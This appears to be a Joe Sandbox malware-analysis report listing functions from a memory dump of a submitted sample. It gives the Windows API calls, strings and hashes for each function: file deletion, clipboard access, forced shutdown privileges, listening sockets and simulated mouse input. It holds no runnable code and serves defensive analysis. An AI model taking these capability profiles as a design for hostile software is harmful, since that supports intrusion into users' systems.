Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 100e40114e3207e5b36e6ac240d5cc9677edd2d829157ad48c696c8b30873b85
Instruction ID: b461e276a2a2dce113d8ba9a0a559e20c610f5ffc6ab9d4fe9812c651612f0cc
Opcode Fuzzy Hash: 100e40114e3207e5b36e6ac240d5cc9677edd2d829157ad48c696c8b30873b85
Instruction Fuzzy Hash: 5D31C33652121AAEDB10AFB4EC48ADE77AC9F4A320F204196E810A30D0DF30DDE5CF64

Function 00268195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00268257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00268267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00268273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00268310
SetCurrentDirectoryW.KERNEL32(?), ref: 00268324
SetCurrentDirectoryW.KERNEL32(?), ref: 00268356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0026838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00268395

Strings

*.*, xrefs: 0026839B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 5d5c4dba0d22ae70ee645c676a3bda175286e7d3e5eb5b6f9eefdb2067f516d1
Instruction ID: 26a138b45c3fc102ba503072791786d75b9e92dd69fa87885c31d145ffddfaa9
Opcode Fuzzy Hash: 5d5c4dba0d22ae70ee645c676a3bda175286e7d3e5eb5b6f9eefdb2067f516d1
Instruction Fuzzy Hash: A0618AB25183459FCB10EF60D8549AEB3E8FF89310F04896EF98987251DB31E995CB92

Function 0025D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F3A97,?,?,001F2E7F,?,?,?,00000000), ref: 001F3AC2

Part of subcall function 0025E199: GetFileAttributesW.KERNEL32(?,0025CF95), ref: 0025E19A

FindFirstFileW.KERNEL32(?,?), ref: 0025D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0025D1DD
MoveFileW.KERNEL32(?,?), ref: 0025D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0025D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0025D237

Part of subcall function 0025D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0025D21C,?,?), ref: 0025D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0025D253
FindClose.KERNEL32(00000000), ref: 0025D264

Strings

\*.*, xrefs: 0025D0CD, 0025D0D6, 0025D0EB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: e02c1a02f9cdd75141dd4cb117c661e734a092da024d541ecaca61c646214ef2
Instruction ID: d1fa609781d96a7c591dded42c6d9094e903a202a8afbdeaf49297c48d0c052c
Opcode Fuzzy Hash: e02c1a02f9cdd75141dd4cb117c661e734a092da024d541ecaca61c646214ef2
Instruction Fuzzy Hash: FF617B7181110EAACF15EFE0D9929FDB7B5AF24341F208165E906B7192EB30AF1DCB64

Function 0026ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0026ED91
EmptyClipboard.USER32 ref: 0026ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0026EDAC
CloseClipboard.USER32 ref: 0026EEA3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2080f06e788ff59df49b5b32a0c8f5c2db564363ad78702be8fb7914f3291be1
Instruction ID: 6812bb5d7b3358d46be388a4bc7ea32c2f15b14567ddef2c83f41df87b5eb718
Opcode Fuzzy Hash: 2080f06e788ff59df49b5b32a0c8f5c2db564363ad78702be8fb7914f3291be1
Instruction Fuzzy Hash: 8841B2792156129FE710DF19E88CF19BBE5FF44328F25C099E4158B6A2C776EC81CB90

Function 0025E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 002516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0025170D
Part of subcall function 002516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0025173A
Part of subcall function 002516C3: GetLastError.KERNEL32 ref: 0025174A

ExitWindowsEx.USER32(?,00000000), ref: 0025E932

Strings

SeShutdownPrivilege, xrefs: 0025E902
, xrefs: 0025E95C
@, xrefs: 0025E925
, xrefs: 0025E920

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 15465eed147be55a21f0369f9779e18f7b846c26e8e9a46bfaa0a7bb7888c0d0
Instruction ID: 221ab857937f41d288a807cf19ba8b40dd18cfc5045b7860ce672e8fcb5777d0
Opcode Fuzzy Hash: 15465eed147be55a21f0369f9779e18f7b846c26e8e9a46bfaa0a7bb7888c0d0
Instruction Fuzzy Hash: 5001FE72A30211AFEF582674AC8AFBF725C9B14752F260422FD13E31D1D6B45D7886A8

Function 00271204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00271276
WSAGetLastError.WSOCK32 ref: 00271283
bind.WSOCK32(00000000,?,00000010), ref: 002712BA
WSAGetLastError.WSOCK32 ref: 002712C5
closesocket.WSOCK32(00000000), ref: 002712F4
listen.WSOCK32(00000000,00000005), ref: 00271303
WSAGetLastError.WSOCK32 ref: 0027130D
closesocket.WSOCK32(00000000), ref: 0027133C

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 25a5a101fd0fc2385c2121fd18a05fe421f2f1a0311c65f7c287436d2cb96952
Instruction ID: a79cda35b30e22c13273ad37a6ed537318939bd9220773bfb50ba7565e4c1ce2
Opcode Fuzzy Hash: 25a5a101fd0fc2385c2121fd18a05fe421f2f1a0311c65f7c287436d2cb96952
Instruction Fuzzy Hash: 154192356001119FD710DF28D488B2ABBE5AF46318F28C188D95A9F2E7C771ED91CBE1

Function 0022B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0022B9D4
_free.LIBCMT ref: 0022B9F8
_free.LIBCMT ref: 0022BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00293700), ref: 0022BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002C121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0022BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002C1270,000000FF,?,0000003F,00000000,?), ref: 0022BC36
_free.LIBCMT ref: 0022BD4B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 60928018a8185b939e36e09e24b1e0143ed2a6c020a9857dba53786fdb8a3d52
Instruction ID: 3782606feaabbe4ab4b9316afbb5614d5aeadd9f1e1796618abb4a63b7cb5f1a
Opcode Fuzzy Hash: 60928018a8185b939e36e09e24b1e0143ed2a6c020a9857dba53786fdb8a3d52
Instruction Fuzzy Hash: 40C12B75924226BFCB12DFF8BC45BAE7BB8EF46310F14419AE890D7252DB309D618B50

Function 0025D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F3A97,?,?,001F2E7F,?,?,?,00000000), ref: 001F3AC2

Part of subcall function 0025E199: GetFileAttributesW.KERNEL32(?,0025CF95), ref: 0025E19A

FindFirstFileW.KERNEL32(?,?), ref: 0025D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0025D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0025D481
FindClose.KERNEL32(00000000), ref: 0025D498
FindClose.KERNEL32(00000000), ref: 0025D4A1

Strings

\*.*, xrefs: 0025D3F2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 2e5b4dfe87a04eb3e25d468bec9bc463983cc49b6936e44734bc7c94381b1408
Instruction ID: a9d1659cfbcc03185e91c49edc1d07816f787f481aca2caf944d221adce1823c
Opcode Fuzzy Hash: 2e5b4dfe87a04eb3e25d468bec9bc463983cc49b6936e44734bc7c94381b1408
Instruction Fuzzy Hash: 8031CE710183499BC310EF64D8958BFB7E8BEA1315F804A2DF9D583191EB30AA0DCB67

Function 0022E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0022E645

Strings

1#IND, xrefs: 0022F83D
1#SNAN, xrefs: 0022F844
1#QNAN, xrefs: 0022F84B
1#INF, xrefs: 0022F852

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f1c25ebd943e04923e03e6ee2a1a372d282849d925d06d60a7503fad0a1642d0
Instruction ID: 3c4a5dc5db937c859ca9c9495fc95553e96f76437ca782677f98c642799f4b49
Opcode Fuzzy Hash: f1c25ebd943e04923e03e6ee2a1a372d282849d925d06d60a7503fad0a1642d0
Instruction Fuzzy Hash: 86C27B71E242299FDF65CEA8ED407EAB3B5EB44304F1541EAD80DE7240E774AE919F40

Function 0026648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002664DC
CoInitialize.OLE32(00000000), ref: 00266639
CoCreateInstance.OLE32(0028FCF8,00000000,00000001,0028FB68,?), ref: 00266650
CoUninitialize.OLE32 ref: 002668D4

Strings

.lnk, xrefs: 002664BA, 00266524, 002665E0

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 9fbe320aa62552d12f0ea0d5ac74a6a9dce68dd38fbb2d0c9788de0efb28ddf7
Instruction ID: 6f668d20f22f6ae2174c8128cd861a18ab98f5c3ccd9ee18eb66d059b3817ee4
Opcode Fuzzy Hash: 9fbe320aa62552d12f0ea0d5ac74a6a9dce68dd38fbb2d0c9788de0efb28ddf7
Instruction Fuzzy Hash: 55D17A715182059FC304EF24C881E6BB7E8FFA9304F44492DF5968B2A1EB70ED49CB92

Function 002722DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002722E8

Part of subcall function 0026E4EC: GetWindowRect.USER32(?,?), ref: 0026E504

GetDesktopWindow.USER32 ref: 00272312
GetWindowRect.USER32(00000000), ref: 00272319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00272355
GetCursorPos.USER32(?), ref: 00272381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002723DF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 1804f2b0b22d2206b340cf7267a679fe70f79ec63ccdc1a294c72e044cb8bb6e
Instruction ID: 072025679ed7b808e4949aed5c755fec06ea562e3c3058cbcd21a7b53795344c
Opcode Fuzzy Hash: 1804f2b0b22d2206b340cf7267a679fe70f79ec63ccdc1a294c72e044cb8bb6e
Instruction Fuzzy Hash: C131E5725053169FDB20DF14D849F5BB7E9FF84310F104919F98997181DB34EA18CB91

Function 00269B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00269B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00269C8B

Part of subcall function 00263874: GetInputState.USER32 ref: 002638CB
Part of subcall function 00263874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00263966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00269BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00269C75

Strings

*.*, xrefs: 00269B5D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: a46a46a8bf527f2cac79c91366df0b4b7d989d8562503405fb983c62bc02db5a
Instruction ID: d8874af3af127bf9a2cc0779fc9bffda7b3d3d40652eaa9d1e289bcf567dea45
Opcode Fuzzy Hash: a46a46a8bf527f2cac79c91366df0b4b7d989d8562503405fb983c62bc02db5a
Instruction Fuzzy Hash: AC417F7191020A9FCF14EF64D989AEEBBF8EF19350F244056F805A2191EB309ED4CF60

Function 0020997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00209BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00209BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00209A4E
GetSysColor.USER32(0000000F), ref: 00209B23
SetBkColor.GDI32(?,00000000), ref: 00209B36

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: b4ca2e6ced5d49a774c406d14635ca2df9575a5d12133622304eb7e124f7591c
Instruction ID: ab63c0abc3732a30a5cdc265117168df8c62a0892f1c1a483073c7fd26316b10
Opcode Fuzzy Hash: b4ca2e6ced5d49a774c406d14635ca2df9575a5d12133622304eb7e124f7591c
Instruction Fuzzy Hash: 64A13870239645AEE728AE2C9C89E7B3A5DDB82304F150209F423D66D3CB659DF1C771

Function 00271806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0027304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0027307A
Part of subcall function 0027304E: _wcslen.LIBCMT ref: 0027309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0027185D
WSAGetLastError.WSOCK32 ref: 00271884
bind.WSOCK32(00000000,?,00000010), ref: 002718DB
WSAGetLastError.WSOCK32 ref: 002718E6
closesocket.WSOCK32(00000000), ref: 00271915

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 54c175037f3fff35a30d2c7647c4523a2b71e1c54c43d2c39cb859da9bb7c68f
Instruction ID: 288c504d426cc9037bd546dad62166a0b8c36f8ce7296c8b4121ad4f6f078dbb
Opcode Fuzzy Hash: 54c175037f3fff35a30d2c7647c4523a2b71e1c54c43d2c39cb859da9bb7c68f
Instruction Fuzzy Hash: 8C51B475A102149FE710AF28D886F3AB7E5AF44718F18C058FA095F3D3C771AD518BA1

Function 00281C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00281CC0
IsWindowEnabled.USER32 ref: 00281CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00281CDB
IsIconic.USER32 ref: 00281CE9
IsZoomed.USER32 ref: 00281CF7

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3146908031a3736e5f1e7c803bb41dcc68c8b358c356d39b6eb6562ab23aea23
Instruction ID: 31a0eb96b0eb09d9bafdb8d96cfa9b0b1ad8c6eb26fc56a191fb932775b20317
Opcode Fuzzy Hash: 3146908031a3736e5f1e7c803bb41dcc68c8b358c356d39b6eb6562ab23aea23
Instruction Fuzzy Hash: E22129397522115FD720AF1AD844B267BE8EF84310F188069E845CB3D1C771EC63CB91

Function 001F8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 001F813C
VUUU, xrefs: 001F83FA
VUUU, xrefs: 001F843C
VUUU, xrefs: 00235DF0
VUUU, xrefs: 001F83E8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 1db3d8fe62ede5a8355e9883d67dd941444c8dccd84da4de5298f39d3c2003fb
Instruction ID: 0c1cec0bdee310b1aa6081b8ffaace6353f3da3b5a890eb5c85dc2844764f0ed
Opcode Fuzzy Hash: 1db3d8fe62ede5a8355e9883d67dd941444c8dccd84da4de5298f39d3c2003fb
Instruction Fuzzy Hash: F8A28FB0E1062ECBDF24CF58C8447BEB7B1BF54314F2585AAE919AB284DB709D91CB50

Function 00258298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002582AA

Strings

(, xrefs: 002582F0
|, xrefs: 002582DA
tb+, xrefs: 002584F4

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
